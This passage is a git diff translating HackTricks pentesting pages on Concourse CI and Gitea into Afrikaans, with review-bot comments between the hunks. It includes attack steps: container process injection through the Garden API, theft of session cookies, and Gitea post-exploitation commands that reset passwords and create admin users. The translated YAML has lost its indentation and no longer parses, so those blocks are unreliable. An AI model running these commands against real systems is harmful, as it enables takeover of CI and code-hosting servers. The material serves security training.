'{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}' # Wget will be stucked there as long as the process is being executed wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \ - --header='Content-Type:application/json' \ - 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' +--header='Content-Type:application/json' \ +'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes' ``` - -However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers: - +However, die webbediener kontroleer elke paar sekondes die houers wat loop, en as 'n onverwagte een ontdek word, sal dit verwyder word. Aangesien die kommunikasie in HTTP plaasvind, kan jy die kommunikasie manipuleer om die verwydering van onverwagte houers te vermy: ``` GET /containers HTTP/1.1. Host: 127.0.0.1:7777. @@ -434,13 +409,8 @@ Host: 127.0.0.1:7777. User-Agent: Go-http-client/1.1. Accept-Encoding: gzip. ``` - -## References +## Verwysings - https://concourse-ci.org/vars.html {{#include ../../banners/hacktricks-training.md}} - - - - 
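Review bot: the translated YAML blocks in this file have lost all their indentation, so the pipeline and task configs no longer parse as the intended structure. In the `#### Pyplyn Skepping/Wysiging` example the job now reads `- name: simple` / `plan:` / `- task: simple-task` with every key at column 0, which turns `plan`, `privileged`, `config` and `params` into top-level keys instead of fields of the job and task, and `fly set-pipeline` will reject it; the same happened to the task_config.yml block under `#### Voer Aangepaste Taak Uit` (`image_resource:` / `type: registry-image` / `source:` all flush left, and the literal block under `- |` no longer indented) and, cosmetically, to the `Has Namespaces:` output block and the `-H` / `-d` / `--header` continuation lines of the curl and wget commands. The removed `-` lines still show the original nesting, so restore that indentation; the translation tooling appears to strip leading whitespace inside fenced blocks, which is worth checking before the rest of the repo is converted the same way.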
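Review bot: several translated sentences still mix English (and one Dutch form) into the Afrikaans text: `+Met die **wysiging/creatie** van 'n nuwe pyplyn` (Dutch `creatie`), `+- **Steal** die **secrets**`, `+- **Escape** na die **node**`, `+- **Delete** geskepte pyplyn`, `+However, die webbediener kontroleer` and `baie meer **stealthier**`. Suggest finishing the translation of those words (for example `Steel`, `Ontsnap`, `Verwyder`, `Egter`) and leaving only real identifiers such as `release_agent` and `privileged: true` untranslated, in backticks as the rest of the page does. The hunks also drop the blank line between each paragraph and the fenced block that follows it (for example `+In die omgewing kan jy ook inligting vind ...:` is now immediately followed by the opening bash fence, and `+Met hierdie toestemmings mag jy in staat wees om:` immediately follows a closing fence); CommonMark tolerates this, but it diverges from the layout of the English source, so keep those blank lines so that future diffs against the English file stay readable.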
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md index 0cc6363a7..5d960758b 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-lab-creation.md @@ -2,25 +2,22 @@ {{#include ../../banners/hacktricks-training.md}} -## Testing Environment +## Toetsomgewing -### Running Concourse +### Loop Concourse -#### With Docker-Compose - -This docker-compose file simplifies the installation to do some tests with concourse: +#### Met Docker-Compose +Hierdie docker-compose-lĂȘer vereenvoudig die installasie om 'n paar toetse met concourse te doen: ```bash wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml docker-compose up -d ``` - You can download the command line `fly` for your OS from the web in `127.0.0.1:8080` -#### With Kubernetes (Recommended) - -You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). +#### Met Kubernetes (Aanbeveel) +You can easily deploy concourse in **Kubernetes** (in **minikube** byvoorbeeld) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart). ```bash brew install helm helm repo add concourse https://concourse-charts.storage.googleapis.com/ 
@@ -31,94 +28,90 @@ helm install concourse-release concourse/concourse # If you need to delete it helm delete concourse-release ``` - -After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets: - +Na die generering van die concourse omgewing, kan jy 'n geheim genereer en toegang gee aan die SA wat in concourse web loop om K8s geheime te benader: ```yaml echo 'apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: - name: read-secrets +name: read-secrets rules: - apiGroups: [""] - resources: ["secrets"] - verbs: ["get"] +resources: ["secrets"] +verbs: ["get"] --- apiVersion: rbac.authorization.k8s.io/v1 kind: RoleBinding metadata: - name: read-secrets-concourse +name: read-secrets-concourse roleRef: - apiGroup: rbac.authorization.k8s.io - kind: ClusterRole - name: read-secrets +apiGroup: rbac.authorization.k8s.io +kind: ClusterRole +name: read-secrets subjects: - kind: ServiceAccount - name: concourse-release-web - namespace: default +name: concourse-release-web +namespace: default --- apiVersion: v1 kind: Secret metadata: - name: super - namespace: concourse-release-main +name: super +namespace: concourse-release-main type: Opaque data: - secret: MWYyZDFlMmU2N2Rm +secret: MWYyZDFlMmU2N2Rm ' | kubectl apply -f - ``` +### Skep Pyplyn -### Create Pipeline +'n Pyplyn bestaan uit 'n lys van [Jobs](https://concourse-ci.org/jobs.html) wat 'n geordende lys van [Steps](https://concourse-ci.org/steps.html) bevat. -A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html). 
+### Stappe -### Steps +Verskeie verskillende tipes stappe kan gebruik word: -Several different type of steps can be used: +- **die** [**`task` stap**](https://concourse-ci.org/task-step.html) **voert 'n** [**taak**](https://concourse-ci.org/tasks.html) **uit** +- die [`get` stap](https://concourse-ci.org/get-step.html) haal 'n [bron](https://concourse-ci.org/resources.html) op +- die [`put` stap](https://concourse-ci.org/put-step.html) werk 'n [bron](https://concourse-ci.org/resources.html) by +- die [`set_pipeline` stap](https://concourse-ci.org/set-pipeline-step.html) konfigureer 'n [pyplyn](https://concourse-ci.org/pipelines.html) +- die [`load_var` stap](https://concourse-ci.org/load-var-step.html) laai 'n waarde in 'n [lokale var](https://concourse-ci.org/vars.html#local-vars) +- die [`in_parallel` stap](https://concourse-ci.org/in-parallel-step.html) voer stappe parallel uit +- die [`do` stap](https://concourse-ci.org/do-step.html) voer stappe in volgorde uit +- die [`across` stap modifier](https://concourse-ci.org/across-step.html#schema.across) voer 'n stap verskeie kere uit; een keer vir elke kombinasie van veranderlike waardes +- die [`try` stap](https://concourse-ci.org/try-step.html) probeer om 'n stap uit te voer en slaag selfs al misluk die stap -- **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) -- the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) -- the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) -- the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) -- the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars) -- the [`in_parallel` 
step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel -- the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence -- the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values -- the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails +Elke [stap](https://concourse-ci.org/steps.html) in 'n [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) loop in sy **eie houer**. Jy kan enigiets wat jy wil binne die houer uitvoer _(d.w.s. voer my toetse uit, voer hierdie bash-skrip uit, bou hierdie beeld, ens.)_. So as jy 'n werk het met vyf stappe, sal Concourse vyf houers skep, een vir elke stap. -Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step. - -Therefore, it's possible to indicate the type of container each step needs to be run in. - -### Simple Pipeline Example +Daarom is dit moontlik om die tipe houer aan te dui waarin elke stap uitgevoer moet word. 
+### Eenvoudige Pyplyn Voorbeeld ```yaml jobs: - - name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - sleep 1000 - echo "$SUPER_SECRET" - params: - SUPER_SECRET: ((super.secret)) +- name: simple +plan: +- task: simple-task +privileged: true +config: +# Tells Concourse which type of worker this task should run on +platform: linux +image_resource: +type: registry-image +source: +repository: busybox # images are pulled from docker hub by default +run: +path: sh +args: +- -cx +- | +sleep 1000 +echo "$SUPER_SECRET" +params: +SUPER_SECRET: ((super.secret)) ``` ```bash 
@@ -130,26 +123,21 @@ fly -t tutorial trigger-job --job pipe-name/simple --watch # From another console fly -t tutorial intercept --job pipe-name/simple ``` +Kontroleer **127.0.0.1:8080** om die pypuntvloei te sien. -Check **127.0.0.1:8080** to see the pipeline flow. +### Bash-skrip met uitvoer/invoer pypunt -### Bash script with output/input pipeline - -It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**. +Dit is moontlik om **die resultate van een taak in 'n lĂȘer te stoor** en aan te dui dat dit 'n uitvoer is en dan die invoer van die volgende taak as die uitvoer van die vorige taak aan te dui. Wat concourse doen, is om **die gids van die vorige taak in die nuwe taak te monteer waar jy toegang kan hĂȘ tot die lĂȘers wat deur die vorige taak geskep is**. 
### Triggers -You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time: +Jy hoef nie die werksgeleenthede handmatig te aktiveer elke keer wanneer jy hulle wil uitvoer nie, jy kan ook program dat hulle elke keer uitgevoer word: -- Some time passes: [Time resource](https://github.com/concourse/time-resource/) -- On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource) -- New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) -- Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) +- 'n Bietjie tyd verby: [Time resource](https://github.com/concourse/time-resource/) +- Op nuwe verbintenisse na die hooftak: [Git resource](https://github.com/concourse/git-resource) +- Nuwe PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource) +- Trek of druk die nuutste beeld van jou app: [Registry-image resource](https://github.com/concourse/registry-image-resource/) -Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) +Kontroleer 'n YAML pypuntvoorbeeld wat aktiveer op nuwe verbintenisse na meester in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/gitea-security/README.md b/src/pentesting-ci-cd/gitea-security/README.md index bf4f6485a..5dc5762c8 100644 --- a/src/pentesting-ci-cd/gitea-security/README.md +++ b/src/pentesting-ci-cd/gitea-security/README.md 
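Review bot: the RBAC and Secret manifest under `#### Met Kubernetes (Aanbeveel)` is broken by the same indentation loss: `metadata:` is now followed by `name: read-secrets` at column 0, and `rules:` / `- apiGroups: [""]` / `resources: ["secrets"]` / `verbs: ["get"]` places `resources` and `verbs` outside the rule entry (likewise `subjects:` / `- kind: ServiceAccount` / `name: concourse-release-web`), so `kubectl apply -f -` will reject all three objects. Restore the two-space nesting shown on the removed `-` lines. The `### Eenvoudige Pyplyn Voorbeeld` job YAML has the same problem (`- name: simple` / `plan:` / `- task: simple-task` all flush left) and will not load with `fly set-pipeline`.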
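Review bot: this file translates "pipeline" as `pypunt` (`+Kontroleer **127.0.0.1:8080** om die pypuntvloei te sien.`, `+### Bash-skrip met uitvoer/invoer pypunt`, `'n YAML pypuntvoorbeeld`) while the same file and the concourse README use `pyplyn` (`+### Skep Pyplyn`, `+### Eenvoudige Pyplyn Voorbeeld`); pick `pyplyn` throughout. Two lines are only half translated, `+You can easily deploy concourse in **Kubernetes** (in **minikube** byvoorbeeld) using the helm-chart` and `+- 'n Bietjie tyd verby: [Time resource]`, and `verbintenisse na meester` translates the branch name, which should stay as the literal `master` (for example `commits na master`). Also `jy kan ook program dat hulle elke keer uitgevoer word` should read `jy kan hulle ook programmeer om elke keer uitgevoer te word`.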
@@ -1,142 +1,130 @@ -# Gitea Security +# Gitea Veiligheid {{#include ../../banners/hacktricks-training.md}} -## What is Gitea +## Wat is Gitea -**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go. +**Gitea** is 'n **self-hosted gemeenskap bestuurde liggewig kode hosting** oplossing geskryf in Go. ![](<../../images/image (160).png>) -### Basic Information +### Basiese Inligting {{#ref}} basic-gitea-information.md {{#endref}} -## Lab - -To run a Gitea instance locally you can just run a docker container: +## Laboratorium +Om 'n Gitea-instantie plaaslik te laat loop, kan jy eenvoudig 'n docker-container uitvoer: ```bash docker run -p 3000:3000 gitea/gitea ``` +Verbind met poort 3000 om die webblad te bekom. -Connect to port 3000 to access the web page. - -You could also run it with kubernetes: - +Jy kan dit ook met kubernetes uitvoer: ``` helm repo add gitea-charts https://dl.gitea.io/charts/ helm install gitea gitea-charts/gitea ``` +## Ongeauthentiseerde Enumerasie -## Unauthenticated Enumeration +- Publieke repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) +- Geregistreerde gebruikers: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) +- Geregistreerde Organisasies: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) -- Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos) -- Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users) -- Registered Organizations: [http://localhost:3000/explore/organizations](http://localhost:3000/explore/organizations) +Let daarop dat **Gitea standaard nuwe gebruikers toelaat om te registreer**. Dit sal nie spesiaal interessante toegang aan die nuwe gebruikers oor ander organisasies/gebruiker repos gee nie, maar 'n **ingelogde gebruiker** mag in staat wees om **meer repos of organisasies te visualiseer**. 
-Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**. +## Interne Exploitatie -## Internal Exploitation +Vir hierdie scenario gaan ons veronderstel dat jy toegang tot 'n github rekening verkry het. -For this scenario we are going to suppose that you have obtained some access to a github account. +### Met Gebruiker Kredensiale/Web Koekie -### With User Credentials/Web Cookie +As jy op een of ander manier reeds kredensiale vir 'n gebruiker binne 'n organisasie het (of jy het 'n sessie koekie gesteel) kan jy **net inlog** en kyk watter **regte jy het** oor watter **repos,** in **watter spanne** jy is, **lys ander gebruikers**, en **hoe die repos beskerm word.** -If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.** - -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. +Let daarop dat **2FA gebruik mag word** so jy sal slegs toegang tot hierdie inligting hĂȘ as jy ook **daardie toets kan slaag**. > [!NOTE] -> Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. +> Let daarop dat as jy **slaag om die `i_like_gitea` koekie te steel** (huidiglik geconfigureer met SameSite: Lax) kan jy **volledig die gebruiker naboots** sonder om kredensiale of 2FA te benodig. -### With User SSH Key +### Met Gebruiker SSH Sleutel -Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). 
- -With this key you can perform **changes in repositories where the user has some privileges**, however you can not use it to access gitea api to enumerate the environment. However, you can **enumerate local settings** to get information about the repos and user you have access to: +Gitea laat **gebruikers** toe om **SSH sleutels** in te stel wat as **authentikasie metode gebruik sal word om kode namens hulle te ontplooi** (geen 2FA word toegepas nie). +Met hierdie sleutel kan jy **veranderings in repositories waar die gebruiker sekere voorregte het, uitvoer**, egter kan jy dit nie gebruik om toegang tot die gitea api te verkry om die omgewing te enumerate nie. Jy kan egter **lokale instellings enumerate** om inligting oor die repos en gebruiker waartoe jy toegang het, te verkry: ```bash # Go to the the repository folder # Get repo config and current user name and email git config --list ``` +As die gebruiker sy gebruikersnaam as sy gitea gebruikersnaam gekonfigureer het, kan jy toegang verkry tot die **publieke sleutels wat hy ingestel het** in sy rekening op _https://github.com/\.keys_, jy kan dit nagaan om te bevestig dat die private sleutel wat jy gevind het, gebruik kan word. -If the user has configured its username as his gitea username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +**SSH sleutels** kan ook in repositories as **deploy sleutels** ingestel word. Enigeen met toegang tot hierdie sleutel sal in staat wees om **projekte vanaf 'n repository te begin**. Gewoonlik in 'n bediener met verskillende deploy sleutels sal die plaaslike lĂȘer **`~/.ssh/config`** jou inligting gee oor watter sleutel verband hou. -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. 
Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. +#### GPG Sleutels -#### GPG Keys - -As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: +Soos verduidelik [**hier**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/gitea-security/broken-reference/README.md) is dit soms nodig om die verbintenisse te teken of jy mag ontdek word. +Kontroleer plaaslik of die huidige gebruiker enige sleutel het met: ```shell gpg --list-secret-keys --keyid-format=long ``` +### Met Gebruikersteken -### With User Token +Vir 'n inleiding oor [**Gebruikersteke kyk na die basiese inligting**](basic-gitea-information.md#personal-access-tokens). -For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens). +'n Gebruikersteken kan gebruik word **in plaas van 'n wagwoord** om te **verifieer** teen die Gitea bediener [**via API**](https://try.gitea.io/api/swagger#/). Dit sal **volledige toegang** oor die gebruiker hĂȘ. -A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user. +### Met Oauth Toepassing -### With Oauth Application +Vir 'n inleiding oor [**Gitea Oauth Toepassings kyk na die basiese inligting**](./#with-oauth-application). -For an introduction about [**Gitea Oauth Applications check the basic information**](./#with-oauth-application). +'n Aanvaller mag 'n **kwaadwillige Oauth Toepassing** skep om toegang te verkry tot bevoorregte data/aksies van die gebruikers wat dit waarskynlik as deel van 'n phishing veldtog aanvaar. 
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +Soos verduidelik in die basiese inligting, sal die toepassing **volledige toegang oor die gebruikersrekening** hĂȘ. -As explained in the basic information, the application will have **full access over the user account**. +### Takbeskerming Omseiling -### Branch Protection Bypass +In Github het ons **github aksies** wat standaard 'n **teken met skrywe toegang** oor die repo ontvang wat gebruik kan word om **takbeskermings te omseil**. In hierdie geval **bestaan dit nie**, so die omseilings is meer beperk. Maar kom ons kyk na wat gedoen kan word: -In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done: +- **Aktiveer Push**: As iemand met skrywe toegang na die tak kan push, push net daarna. +- **Whitelist Beperkte Push**: Op dieselfde manier, as jy deel van hierdie lys is, push na die tak. +- **Aktiveer Samevoeg Whitelist**: As daar 'n samevoeg whitelist is, moet jy binne dit wees. +- **Vereis goedkeuring is groter as 0**: Dan... moet jy 'n ander gebruiker kompromitteer. +- **Beperk goedkeuring tot whitelisted**: As slegs whitelisted gebruikers kan goedkeur... moet jy 'n ander gebruiker kompromitteer wat binne daardie lys is. +- **Verwerp verouderde goedkeuring**: As goedkeuring nie verwyder word met nuwe verbintenisse nie, kan jy 'n reeds goedgekeurde PR oorneem om jou kode in te voeg en die PR te saamvoeg. -- **Enable Push**: If anyone with write access can push to the branch, just push to it. -- **Whitelist Restricted Pus**h: The same way, if you are part of this list push to the branch. 
-- **Enable Merge Whitelist**: If there is a merge whitelist, you need to be inside of it -- **Require approvals is bigger than 0**: Then... you need to compromise another user -- **Restrict approvals to whitelisted**: If only whitelisted users can approve... you need to compromise another user that is inside that list -- **Dismiss stale approvals**: If approvals are not removed with new commits, you could hijack an already approved PR to inject your code and merge the PR. +Let daarop dat **as jy 'n org/repo admin is** jy die beskermings kan omseil. -Note that **if you are an org/repo admin** you can bypass the protections. +### Enumereer Webhooks -### Enumerate Webhooks +**Webhooks** is in staat om **spesifieke gitea inligting na sekere plekke te stuur**. Jy mag in staat wees om **daardie kommunikasie te benut**.\ +E however, gewoonlik word 'n **geheim** wat jy **nie kan herwin nie** in die **webhook** gestel wat **voorkom** dat eksterne gebruikers wat die URL van die webhook ken maar nie die geheim nie, om **daardie webhook te benut**.\ +Maar in sommige gevalle, in plaas daarvan om die **geheim** op sy plek te stel, stel mense dit **in die URL** as 'n parameter, so **om die URL's te kontroleer** kan jou toelaat om **geheime te vind** en ander plekke wat jy verder kan benut. -**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\ -However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\ -But in some occasions, people instead of setting the **secret** in its place, they **set it in the URL** as a parameter, so **checking the URLs** could allow you to **find secrets** and other places you could exploit further. +Webhooks kan op **repo en org vlak** gestel word. -Webhooks can be set at **repo and at org level**. 
+## Post Exploitatie -## Post Exploitation +### Binne die bediener -### Inside the server +As jy op een of ander manier daarin geslaag het om binne die bediener waar gitea loop te kom, moet jy soek na die gitea konfigurasie lĂȘer. Standaard is dit geleĂ« in `/data/gitea/conf/app.ini` -If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini` +In hierdie lĂȘer kan jy **sleutels** en **wagwoorde** vind. -In this file you can find **keys** and **passwords**. +In die gitea pad (standaard: /data/gitea) kan jy ook interessante inligting vind soos: -In the gitea path (by default: /data/gitea) you can find also interesting information like: +- Die **sqlite** DB: As gitea nie 'n eksterne db gebruik nie, sal dit 'n sqlite db gebruik. +- Die **sessies** binne die sessies gids: Deur `cat sessions/*/*/*` te loop, kan jy die gebruikersname van die ingelogde gebruikers sien (gitea kan ook die sessies binne die DB stoor). +- Die **jwt private sleutel** binne die jwt gids. +- Meer **sensitiewe inligting** kan in hierdie gids gevind word. -- The **sqlite** DB: If gitea is not using an external db it will use a sqlite db -- The **sessions** inside the sessions folder: Running `cat sessions/*/*/*` you can see the usernames of the logged users (gitea could also save the sessions inside the DB). 
-- The **jwt private key** inside the jwt folder -- More **sensitive information** could be found in this folder +As jy binne die bediener is, kan jy ook **die `gitea` binĂȘre** gebruik om inligting te bekom/wysig: -If you are inside the server you can also **use the `gitea` binary** to access/modify information: - -- `gitea dump` will dump gitea and generate a .zip file -- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) -- `gitea admin user change-password --username admin --password newpassword` Change the password -- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token +- `gitea dump` sal gitea dump en 'n .zip lĂȘer genereer. +- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` sal 'n teken van die aangeduide tipe genereer (volharding). +- `gitea admin user change-password --username admin --password newpassword` Verander die wagwoord. +- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Skep 'n nuwe admin gebruiker en kry 'n toegangsteken. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md index e6e4d9ba3..411c83250 100644 --- a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md +++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md 
@@ -4,104 +4,100 @@ ## Basic Structure -The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. +Die basiese Gitea omgewingstruktuur is om repos te groepeer volgens **organisasie(s),** elk van hulle kan **verskeie repositories** en **verskeie span** bevat. Let egter daarop dat, net soos in github, gebruikers repos buite die organisasie kan hĂȘ. -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. +Boonop kan 'n **gebruiker** 'n **lid** van **verskillende organisasies** wees. Binne die organisasie kan die gebruiker **verskillende toestemmings oor elke repository** hĂȘ. -A user may also be **part of different teams** with different permissions over different repos. +'n Gebruiker kan ook **deel wees van verskillende spanne** met verskillende toestemmings oor verskillende repos. -And finally **repositories may have special protection mechanisms**. +En uiteindelik **kan repositories spesiale beskermingsmeganismes hĂȘ**. ## Permissions ### Organizations -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. +Wanneer 'n **organisasie geskep word** word 'n span genaamd **Eienaars** **geskep** en die gebruiker word daarin geplaas. Hierdie span sal **admin toegang** oor die **organisasie** gee, daardie **toestemmings** en die **naam** van die span **kan nie gewysig word** nie. 
-**Org admins** (owners) can select the **visibility** of the organization: +**Org admins** (eienaars) kan die **sigbaarheid** van die organisasie kies: -- Public -- Limited (logged in users only) -- Private (members only) +- Publiek +- Beperk (slegs ingelogde gebruikers) +- Privaat (slegs lede) -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. +**Org admins** kan ook aandui of die **repo admins** **toegang kan voeg of verwyder** vir spanne. Hulle kan ook die maksimum aantal repos aandui. -When creating a new team, several important settings are selected: +Wanneer 'n nuwe span geskep word, word verskeie belangrike instellings gekies: -- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. -- It's also indicated **if members can create new repos** (creator will get admin access to it) -- The **permissions** the **members** of the repo will **have**: - - **Administrator** access - - **Specific** access: +- Dit word aangedui watter **repos van die org die lede van die span toegang sal hĂȘ**: spesifieke repos (repos waar die span bygevoeg is) of almal. +- Dit word ook aangedui **of lede nuwe repos kan skep** (die skepper sal admin toegang tot dit kry) +- Die **toestemmings** wat die **lede** van die repo **sal hĂȘ**: +- **Administrateur** toegang +- **Spesifieke** toegang: ![](<../../images/image (118).png>) ### Teams & Users -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: +In 'n repo kan die **org admin** en die **repo admins** (indien toegelaat deur die org) die **rolle** wat aan samewerkers (ander gebruikers) en spanne gegee word, **bestuur**. 
Daar is **3** moontlike **rolle**: -- Administrator -- Write -- Read +- Administrateur +- Skryf +- Lees ## Gitea Authentication ### Web Access -Using **username + password** and potentially (and recommended) a 2FA. +Gebruik **gebruikersnaam + wagwoord** en moontlik (en aanbeveel) 'n 2FA. ### **SSH Keys** -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) +Jy kan jou rekening met een of verskeie publieke sleutels konfigureer wat die verwante **private sleutel toelaat om aksies namens jou uit te voer.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) #### **GPG Keys** -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. +Jy **kan nie die gebruiker met hierdie sleutels naboots nie** maar as jy dit nie gebruik nie, kan dit moontlik wees dat jy **ontdek word vir die stuur van commits sonder 'n handtekening**. ### **Personal Access Tokens** -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) +Jy kan 'n persoonlike toegangstoken genereer om **'n toepassing toegang tot jou rekening te gee**. 
'n Persoonlike toegangstoken gee volle toegang oor jou rekening: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) ### Oauth Applications -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: +Net soos persoonlike toegangstokens sal **Oauth applications** **volledige toegang** oor jou rekening en die plekke waar jou rekening toegang het hĂȘ, omdat, soos in die [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes) aangedui, scopes nog nie ondersteun word nie: ![](<../../images/image (194).png>) ### Deploy keys -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. +Deploy sleutels kan slegs lees- of skryftoegang tot die repo hĂȘ, so hulle kan interessant wees om spesifieke repos te kompromitteer. ## Branch Protections -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. +Branch beskermings is ontwerp om **nie volledige beheer van 'n repository** aan die gebruikers te gee nie. Die doel is om **verskeie beskermingsmetodes te plaas voordat jy in staat is om kode in 'n sekere tak te skryf**. -The **branch protections of a repository** can be found in 